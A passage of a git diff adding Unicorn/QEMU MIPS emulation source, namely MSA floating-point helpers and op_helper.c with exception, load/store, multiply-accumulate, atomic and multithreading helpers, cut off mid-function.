&(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_RECIPROCAL(pwx->w[i], pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_RECIPROCAL(pwx->d[i], pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_frint_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], round_to_int, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], round_to_int, 
pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_LOGB(DEST, ARG, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + set_float_rounding_mode(float_round_down, \ + &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## log2(ARG, \ + &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## round_to_int(DEST, \ + &env->active_tc.msa_fp_status); \ + set_float_rounding_mode(ieee_rm[(env->active_tc.msacsr & \ + MSACSR_RM_MASK) >> MSACSR_RM], \ + &env->active_tc.msa_fp_status); \ + \ + set_float_exception_flags( \ + get_float_exception_flags(&env->active_tc.msa_fp_status) \ + & (~float_flag_inexact), \ + &env->active_tc.msa_fp_status); \ + \ + c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_flog2_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_LOGB(pwx->w[i], pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_LOGB(pwx->d[i], pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fexupl_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + /* Half precision floats come in two formats: standard + IEEE and "ARM" format. 
The latter gains extra exponent + range by omitting the NaN/Inf encodings. */ + flag ieee = 1; + + MSA_FLOAT_BINOP(pwx->w[i], from_float16, Lh(pws, i), ieee, 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_float32, Lw(pws, i), 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +void helper_msa_fexupr_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + /* Half precision floats come in two formats: standard + IEEE and "ARM" format. The latter gains extra exponent + range by omitting the NaN/Inf encodings. */ + flag ieee = 1; + + MSA_FLOAT_BINOP(pwx->w[i], from_float16, Rh(pws, i), ieee, 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_float32, Rw(pws, i), 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +void helper_msa_ffql_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], from_q16, Lh(pws, i), 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_q32, Lw(pws, i), 64); + } + break; + default: + assert(0); + } + + msa_move_v(pwd, pwx); +} + +void helper_msa_ffqr_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 
0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], from_q16, Rh(pws, i), 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_q32, Rw(pws, i), 64); + } + break; + default: + assert(0); + } + + msa_move_v(pwd, pwx); +} + +void helper_msa_ftint_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP0(pwx->w[i], to_int32, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP0(pwx->d[i], to_int64, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_ftint_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP0(pwx->w[i], to_uint32, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP0(pwx->d[i], to_uint64, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define float32_from_int32 int32_to_float32 +#define float32_from_uint32 uint32_to_float32 + +#define float64_from_int64 int64_to_float64 +#define float64_from_uint64 uint64_to_float64 + +void helper_msa_ffint_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case 
DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], from_int32, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_int64, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_ffint_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], from_uint32, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], from_uint64, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/op_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/op_helper.c new file mode 100644 index 0000000..0855d8a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/op_helper.c @@ -0,0 +1,3713 @@ +/* + * MIPS emulation helpers for qemu. + * + * Copyright (c) 2004-2005 Jocelyn Mayer + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include +#include "cpu.h" +#include "qemu/host-utils.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +#ifndef CONFIG_USER_ONLY +static inline void cpu_mips_tlb_flush (CPUMIPSState *env, int flush_global); +#endif + +/*****************************************************************************/ +/* Exceptions processing helpers */ + +static inline void QEMU_NORETURN do_raise_exception_err(CPUMIPSState *env, + uint32_t exception, + int error_code, + uintptr_t pc) +{ + CPUState *cs = CPU(mips_env_get_cpu(env)); + + if (exception < EXCP_SC) { + qemu_log("%s: %d %d\n", __func__, exception, error_code); + } + cs->exception_index = exception; + env->error_code = error_code; + + if (pc) { + /* now we have a real cpu fault */ + cpu_restore_state(cs, pc); + } + + if (exception == 0x11) { + env->uc->next_pc = env->active_tc.PC + 4; + } + + cpu_loop_exit(cs); +} + +static inline void QEMU_NORETURN do_raise_exception(CPUMIPSState *env, + uint32_t exception, + uintptr_t pc) +{ + do_raise_exception_err(env, exception, 0, pc); +} + +void helper_raise_exception_err(CPUMIPSState *env, uint32_t exception, + int error_code) +{ + do_raise_exception_err(env, exception, error_code, 0); +} + +void helper_raise_exception(CPUMIPSState *env, uint32_t exception) +{ + do_raise_exception(env, exception, 0); +} + +#if defined(CONFIG_USER_ONLY) +#define HELPER_LD(name, insn, type) \ +static inline type do_##name(CPUMIPSState *env, target_ulong addr, \ + int mem_idx) \ +{ \ + return (type) insn##_raw(addr); \ +} +#else +#define HELPER_LD(name, insn, type) \ +static inline type do_##name(CPUMIPSState *env, target_ulong addr, \ + int mem_idx) \ +{ \ + switch (mem_idx) \ + { \ + case 0: return (type) cpu_##insn##_kernel(env, addr); break; \ + case 1: return (type) cpu_##insn##_super(env, addr); break; \ + default: \ + case 2: return (type) 
cpu_##insn##_user(env, addr); break; \ + } \ +} +#endif +HELPER_LD(lbu, ldub, uint8_t) +HELPER_LD(lhu, lduw, uint16_t) +HELPER_LD(lw, ldl, int32_t) +HELPER_LD(ld, ldq, int64_t) +#undef HELPER_LD + +#if defined(CONFIG_USER_ONLY) +#define HELPER_ST(name, insn, type) \ +static inline void do_##name(CPUMIPSState *env, target_ulong addr, \ + type val, int mem_idx) \ +{ \ + insn##_raw(addr, val); \ +} +#else +#define HELPER_ST(name, insn, type) \ +static inline void do_##name(CPUMIPSState *env, target_ulong addr, \ + type val, int mem_idx) \ +{ \ + switch (mem_idx) \ + { \ + case 0: cpu_##insn##_kernel(env, addr, val); break; \ + case 1: cpu_##insn##_super(env, addr, val); break; \ + default: \ + case 2: cpu_##insn##_user(env, addr, val); break; \ + } \ +} +#endif +HELPER_ST(sb, stb, uint8_t) +HELPER_ST(sh, stw, uint16_t) +HELPER_ST(sw, stl, uint32_t) +HELPER_ST(sd, stq, uint64_t) +#undef HELPER_ST + +target_ulong helper_clo (target_ulong arg1) +{ + return clo32(arg1); +} + +target_ulong helper_clz (target_ulong arg1) +{ + return clz32(arg1); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_dclo (target_ulong arg1) +{ + return clo64(arg1); +} + +target_ulong helper_dclz (target_ulong arg1) +{ + return clz64(arg1); +} +#endif /* TARGET_MIPS64 */ + +/* 64 bits arithmetic for 32 bits hosts */ +static inline uint64_t get_HILO(CPUMIPSState *env) +{ + return ((uint64_t)(env->active_tc.HI[0]) << 32) | (uint32_t)env->active_tc.LO[0]; +} + +static inline target_ulong set_HIT0_LO(CPUMIPSState *env, uint64_t HILO) +{ + target_ulong tmp; + env->active_tc.LO[0] = (int32_t)(HILO & 0xFFFFFFFF); + tmp = env->active_tc.HI[0] = (int32_t)(HILO >> 32); + return tmp; +} + +static inline target_ulong set_HI_LOT0(CPUMIPSState *env, uint64_t HILO) +{ + target_ulong tmp = env->active_tc.LO[0] = (int32_t)(HILO & 0xFFFFFFFF); + env->active_tc.HI[0] = (int32_t)(HILO >> 32); + return tmp; +} + +/* Multiplication variants of the vr54xx. 
 */
/*
 * Each helper below computes a 64-bit product (or multiply-accumulate)
 * from two 32-bit GPR operands and deposits it into the HI/LO pair.
 * Two store helpers exist (defined earlier in this file) and differ only
 * in which half they return to the caller:
 *   set_HI_LOT0() - stores HI/LO, returns the LO half;
 *   set_HIT0_LO() - stores HI/LO, returns the HI half.
 */

/* muls: HI/LO = -(rs * rt), signed 32x32->64; returns LO. */
target_ulong helper_muls(CPUMIPSState *env, target_ulong arg1,
                         target_ulong arg2)
{
    return set_HI_LOT0(env, 0 - ((int64_t)(int32_t)arg1 *
                                 (int64_t)(int32_t)arg2));
}

/* mulsu: HI/LO = -(rs * rt), unsigned 32x32->64; returns LO. */
target_ulong helper_mulsu(CPUMIPSState *env, target_ulong arg1,
                          target_ulong arg2)
{
    return set_HI_LOT0(env, 0 - (uint64_t)(uint32_t)arg1 *
                       (uint64_t)(uint32_t)arg2);
}

/* macc: HI/LO += rs * rt, signed; returns LO. */
target_ulong helper_macc(CPUMIPSState *env, target_ulong arg1,
                         target_ulong arg2)
{
    return set_HI_LOT0(env, (int64_t)get_HILO(env) + (int64_t)(int32_t)arg1 *
                       (int64_t)(int32_t)arg2);
}

/* macchi: same accumulate as macc, but returns HI. */
target_ulong helper_macchi(CPUMIPSState *env, target_ulong arg1,
                           target_ulong arg2)
{
    return set_HIT0_LO(env, (int64_t)get_HILO(env) + (int64_t)(int32_t)arg1 *
                       (int64_t)(int32_t)arg2);
}

/* maccu: HI/LO += rs * rt, unsigned; returns LO. */
target_ulong helper_maccu(CPUMIPSState *env, target_ulong arg1,
                          target_ulong arg2)
{
    return set_HI_LOT0(env, (uint64_t)get_HILO(env) +
                       (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2);
}

/* macchiu: same accumulate as maccu, but returns HI. */
target_ulong helper_macchiu(CPUMIPSState *env, target_ulong arg1,
                            target_ulong arg2)
{
    return set_HIT0_LO(env, (uint64_t)get_HILO(env) +
                       (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2);
}

/* msac: HI/LO -= rs * rt, signed; returns LO. */
target_ulong helper_msac(CPUMIPSState *env, target_ulong arg1,
                         target_ulong arg2)
{
    return set_HI_LOT0(env, (int64_t)get_HILO(env) - (int64_t)(int32_t)arg1 *
                       (int64_t)(int32_t)arg2);
}

/* msachi: same subtract-accumulate as msac, but returns HI. */
target_ulong helper_msachi(CPUMIPSState *env, target_ulong arg1,
                           target_ulong arg2)
{
    return set_HIT0_LO(env, (int64_t)get_HILO(env) - (int64_t)(int32_t)arg1 *
                       (int64_t)(int32_t)arg2);
}

/* msacu: HI/LO -= rs * rt, unsigned; returns LO. */
target_ulong helper_msacu(CPUMIPSState *env, target_ulong arg1,
                          target_ulong arg2)
{
    return set_HI_LOT0(env, (uint64_t)get_HILO(env) -
                       (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2);
}

/* msachiu: same subtract-accumulate as msacu, but returns HI. */
target_ulong helper_msachiu(CPUMIPSState *env, target_ulong arg1,
                            target_ulong arg2)
{
    return set_HIT0_LO(env, (uint64_t)get_HILO(env) -
                       (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2);
}

target_ulong helper_mulhi(CPUMIPSState
*env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); +} + +target_ulong helper_mulhiu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, (uint64_t)(uint32_t)arg1 * + (uint64_t)(uint32_t)arg2); +} + +target_ulong helper_mulshi(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, 0 - (int64_t)(int32_t)arg1 * + (int64_t)(int32_t)arg2); +} + +target_ulong helper_mulshiu(CPUMIPSState *env, target_ulong arg1, + target_ulong arg2) +{ + return set_HIT0_LO(env, 0 - (uint64_t)(uint32_t)arg1 * + (uint64_t)(uint32_t)arg2); +} + +static inline target_ulong bitswap(target_ulong v) +{ + v = ((v >> 1) & (target_ulong)0x5555555555555555ULL) | + ((v & (target_ulong)0x5555555555555555ULL) << 1); + v = ((v >> 2) & (target_ulong)0x3333333333333333ULL) | + ((v & (target_ulong)0x3333333333333333ULL) << 2); + v = ((v >> 4) & (target_ulong)0x0F0F0F0F0F0F0F0FULL) | + ((v & (target_ulong)0x0F0F0F0F0F0F0F0FULL) << 4); + return v; +} + +#ifdef TARGET_MIPS64 +target_ulong helper_dbitswap(target_ulong rt) +{ + return bitswap(rt); +} +#endif + +target_ulong helper_bitswap(target_ulong rt) +{ + return (int32_t)bitswap(rt); +} + +#ifndef CONFIG_USER_ONLY + +static inline hwaddr do_translate_address(CPUMIPSState *env, + target_ulong address, + int rw) +{ + hwaddr lladdr; + + lladdr = cpu_mips_translate_address(env, address, rw); + + if (lladdr == -1LL) { + cpu_loop_exit(CPU(mips_env_get_cpu(env))); + } else { + return lladdr; + } +} + +#define HELPER_LD_ATOMIC(name, insn) \ +target_ulong helper_##name(CPUMIPSState *env, target_ulong arg, int mem_idx) \ +{ \ + env->lladdr = do_translate_address(env, arg, 0); \ + env->llval = do_##insn(env, arg, mem_idx); \ + return env->llval; \ +} +HELPER_LD_ATOMIC(ll, lw) +#ifdef TARGET_MIPS64 +HELPER_LD_ATOMIC(lld, ld) +#endif +#undef HELPER_LD_ATOMIC + +#define HELPER_ST_ATOMIC(name, ld_insn, st_insn, almask) \ 
+target_ulong helper_##name(CPUMIPSState *env, target_ulong arg1, \ + target_ulong arg2, int mem_idx) \ +{ \ + target_long tmp; \ + \ + if (arg2 & almask) { \ + env->CP0_BadVAddr = arg2; \ + helper_raise_exception(env, EXCP_AdES); \ + } \ + if (do_translate_address(env, arg2, 1) == env->lladdr) { \ + tmp = do_##ld_insn(env, arg2, mem_idx); \ + if (tmp == env->llval) { \ + do_##st_insn(env, arg2, arg1, mem_idx); \ + return 1; \ + } \ + } \ + return 0; \ +} +HELPER_ST_ATOMIC(sc, lw, sw, 0x3) +#ifdef TARGET_MIPS64 +HELPER_ST_ATOMIC(scd, ld, sd, 0x7) +#endif +#undef HELPER_ST_ATOMIC +#endif + +#ifdef TARGET_WORDS_BIGENDIAN +#define GET_LMASK(v) ((v) & 3) +#define GET_OFFSET(addr, offset) (addr + (offset)) +#else +#define GET_LMASK(v) (((v) & 3) ^ 3) +#define GET_OFFSET(addr, offset) (addr - (offset)) +#endif + +void helper_swl(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, + int mem_idx) +{ + do_sb(env, arg2, (uint8_t)(arg1 >> 24), mem_idx); + + if (GET_LMASK(arg2) <= 2) + do_sb(env, GET_OFFSET(arg2, 1), (uint8_t)(arg1 >> 16), mem_idx); + + if (GET_LMASK(arg2) <= 1) + do_sb(env, GET_OFFSET(arg2, 2), (uint8_t)(arg1 >> 8), mem_idx); + + if (GET_LMASK(arg2) == 0) + do_sb(env, GET_OFFSET(arg2, 3), (uint8_t)arg1, mem_idx); +} + +void helper_swr(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, + int mem_idx) +{ + do_sb(env, arg2, (uint8_t)arg1, mem_idx); + + if (GET_LMASK(arg2) >= 1) + do_sb(env, GET_OFFSET(arg2, -1), (uint8_t)(arg1 >> 8), mem_idx); + + if (GET_LMASK(arg2) >= 2) + do_sb(env, GET_OFFSET(arg2, -2), (uint8_t)(arg1 >> 16), mem_idx); + + if (GET_LMASK(arg2) == 3) + do_sb(env, GET_OFFSET(arg2, -3), (uint8_t)(arg1 >> 24), mem_idx); +} + +#if defined(TARGET_MIPS64) +/* "half" load and stores. We must do the memory access inline, + or fault handling won't work. 
*/ + +#ifdef TARGET_WORDS_BIGENDIAN +#define GET_LMASK64(v) ((v) & 7) +#else +#define GET_LMASK64(v) (((v) & 7) ^ 7) +#endif + +void helper_sdl(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, + int mem_idx) +{ + do_sb(env, arg2, (uint8_t)(arg1 >> 56), mem_idx); + + if (GET_LMASK64(arg2) <= 6) + do_sb(env, GET_OFFSET(arg2, 1), (uint8_t)(arg1 >> 48), mem_idx); + + if (GET_LMASK64(arg2) <= 5) + do_sb(env, GET_OFFSET(arg2, 2), (uint8_t)(arg1 >> 40), mem_idx); + + if (GET_LMASK64(arg2) <= 4) + do_sb(env, GET_OFFSET(arg2, 3), (uint8_t)(arg1 >> 32), mem_idx); + + if (GET_LMASK64(arg2) <= 3) + do_sb(env, GET_OFFSET(arg2, 4), (uint8_t)(arg1 >> 24), mem_idx); + + if (GET_LMASK64(arg2) <= 2) + do_sb(env, GET_OFFSET(arg2, 5), (uint8_t)(arg1 >> 16), mem_idx); + + if (GET_LMASK64(arg2) <= 1) + do_sb(env, GET_OFFSET(arg2, 6), (uint8_t)(arg1 >> 8), mem_idx); + + if (GET_LMASK64(arg2) <= 0) + do_sb(env, GET_OFFSET(arg2, 7), (uint8_t)arg1, mem_idx); +} + +void helper_sdr(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, + int mem_idx) +{ + do_sb(env, arg2, (uint8_t)arg1, mem_idx); + + if (GET_LMASK64(arg2) >= 1) + do_sb(env, GET_OFFSET(arg2, -1), (uint8_t)(arg1 >> 8), mem_idx); + + if (GET_LMASK64(arg2) >= 2) + do_sb(env, GET_OFFSET(arg2, -2), (uint8_t)(arg1 >> 16), mem_idx); + + if (GET_LMASK64(arg2) >= 3) + do_sb(env, GET_OFFSET(arg2, -3), (uint8_t)(arg1 >> 24), mem_idx); + + if (GET_LMASK64(arg2) >= 4) + do_sb(env, GET_OFFSET(arg2, -4), (uint8_t)(arg1 >> 32), mem_idx); + + if (GET_LMASK64(arg2) >= 5) + do_sb(env, GET_OFFSET(arg2, -5), (uint8_t)(arg1 >> 40), mem_idx); + + if (GET_LMASK64(arg2) >= 6) + do_sb(env, GET_OFFSET(arg2, -6), (uint8_t)(arg1 >> 48), mem_idx); + + if (GET_LMASK64(arg2) == 7) + do_sb(env, GET_OFFSET(arg2, -7), (uint8_t)(arg1 >> 56), mem_idx); +} +#endif /* TARGET_MIPS64 */ + +static const int multiple_regs[] = { 16, 17, 18, 19, 20, 21, 22, 23, 30 }; + +void helper_lwm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, + uint32_t 
mem_idx)
{
    /* LWM: load the first 'base_reglist' registers of multiple_regs[]
       (s0..s7, fp) from consecutive words at 'addr'; bit 4 of the
       reglist additionally selects ra (r31), loaded last. */
    target_ulong base_reglist = reglist & 0xf;
    target_ulong do_r31 = reglist & 0x10;

    if (base_reglist > 0 && base_reglist <= ARRAY_SIZE (multiple_regs)) {
        target_ulong i;

        for (i = 0; i < base_reglist; i++) {
            /* Sign-extend each 32-bit word into the target register. */
            env->active_tc.gpr[multiple_regs[i]] =
                (target_long)do_lw(env, addr, mem_idx);
            addr += 4;
        }
    }

    if (do_r31) {
        env->active_tc.gpr[31] = (target_long)do_lw(env, addr, mem_idx);
    }
}

/* SWM: store-multiple counterpart of helper_lwm, same reglist encoding. */
void helper_swm(CPUMIPSState *env, target_ulong addr, target_ulong reglist,
                uint32_t mem_idx)
{
    target_ulong base_reglist = reglist & 0xf;
    target_ulong do_r31 = reglist & 0x10;

    if (base_reglist > 0 && base_reglist <= ARRAY_SIZE (multiple_regs)) {
        target_ulong i;

        for (i = 0; i < base_reglist; i++) {
            do_sw(env, addr, env->active_tc.gpr[multiple_regs[i]], mem_idx);
            addr += 4;
        }
    }

    if (do_r31) {
        do_sw(env, addr, env->active_tc.gpr[31], mem_idx);
    }
}

#if defined(TARGET_MIPS64)
/* LDM: 64-bit variant of helper_lwm, stepping 8 bytes per register. */
void helper_ldm(CPUMIPSState *env, target_ulong addr, target_ulong reglist,
                uint32_t mem_idx)
{
    target_ulong base_reglist = reglist & 0xf;
    target_ulong do_r31 = reglist & 0x10;

    if (base_reglist > 0 && base_reglist <= ARRAY_SIZE (multiple_regs)) {
        target_ulong i;

        for (i = 0; i < base_reglist; i++) {
            env->active_tc.gpr[multiple_regs[i]] = do_ld(env, addr, mem_idx);
            addr += 8;
        }
    }

    if (do_r31) {
        env->active_tc.gpr[31] = do_ld(env, addr, mem_idx);
    }
}

/* SDM: 64-bit variant of helper_swm. */
void helper_sdm(CPUMIPSState *env, target_ulong addr, target_ulong reglist,
                uint32_t mem_idx)
{
    target_ulong base_reglist = reglist & 0xf;
    target_ulong do_r31 = reglist & 0x10;

    if (base_reglist > 0 && base_reglist <= ARRAY_SIZE (multiple_regs)) {
        target_ulong i;

        for (i = 0; i < base_reglist; i++) {
            do_sd(env, addr, env->active_tc.gpr[multiple_regs[i]], mem_idx);
            addr += 8;
        }
    }

    if (do_r31) {
        do_sd(env, addr, env->active_tc.gpr[31], mem_idx);
    }
}
#endif

#ifndef CONFIG_USER_ONLY
/* SMP helpers.
*/ +static bool mips_vpe_is_wfi(MIPSCPU *c) +{ + CPUState *cpu = CPU(c); + CPUMIPSState *env = &c->env; + + /* If the VPE is halted but otherwise active, it means it's waiting for + an interrupt. */ + return cpu->halted && mips_vpe_active(env); +} + +static inline void mips_vpe_wake(MIPSCPU *c) +{ + /* Dont set ->halted = 0 directly, let it be done via cpu_has_work + because there might be other conditions that state that c should + be sleeping. */ + cpu_interrupt(CPU(c), CPU_INTERRUPT_WAKE); +} + +static inline void mips_vpe_sleep(MIPSCPU *cpu) +{ + CPUState *cs = CPU(cpu); + + /* The VPE was shut off, really go to bed. + Reset any old _WAKE requests. */ + cs->halted = 1; + cpu_reset_interrupt(cs, CPU_INTERRUPT_WAKE); +} + +static inline void mips_tc_wake(MIPSCPU *cpu, int tc) +{ + CPUMIPSState *c = &cpu->env; + + /* FIXME: TC reschedule. */ + if (mips_vpe_active(c) && !mips_vpe_is_wfi(cpu)) { + mips_vpe_wake(cpu); + } +} + +static inline void mips_tc_sleep(MIPSCPU *cpu, int tc) +{ + CPUMIPSState *c = &cpu->env; + + /* FIXME: TC reschedule. */ + if (!mips_vpe_active(c)) { + mips_vpe_sleep(cpu); + } +} + +/** + * mips_cpu_map_tc: + * @env: CPU from which mapping is performed. + * @tc: Should point to an int with the value of the global TC index. + * + * This function will transform @tc into a local index within the + * returned #CPUMIPSState. + */ +/* FIXME: This code assumes that all VPEs have the same number of TCs, + which depends on runtime setup. Can probably be fixed by + walking the list of CPUMIPSStates. */ +static CPUMIPSState *mips_cpu_map_tc(CPUMIPSState *env, int *tc) +{ + MIPSCPU *cpu; + CPUState *cs; + CPUState *other_cs; + int vpe_idx; + int tc_idx = *tc; + + if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP))) { + /* Not allowed to address other CPUs. 
*/ + *tc = env->current_tc; + return env; + } + + cs = CPU(mips_env_get_cpu(env)); + vpe_idx = tc_idx / cs->nr_threads; + *tc = tc_idx % cs->nr_threads; + other_cs = qemu_get_cpu(env->uc, vpe_idx); + if (other_cs == NULL) { + return env; + } + cpu = MIPS_CPU(env->uc, other_cs); + return &cpu->env; +} + +/* The per VPE CP0_Status register shares some fields with the per TC + CP0_TCStatus registers. These fields are wired to the same registers, + so changes to either of them should be reflected on both registers. + + Also, EntryHi shares the bottom 8 bit ASID with TCStauts. + + These helper call synchronizes the regs for a given cpu. */ + +/* Called for updates to CP0_Status. */ +static void sync_c0_status(CPUMIPSState *env, CPUMIPSState *cpu, int tc) +{ + int32_t tcstatus, *tcst; + uint32_t v = cpu->CP0_Status; + uint32_t cu, mx, asid, ksu; + uint32_t mask = ((1 << CP0TCSt_TCU3) + | (1 << CP0TCSt_TCU2) + | (1 << CP0TCSt_TCU1) + | (1 << 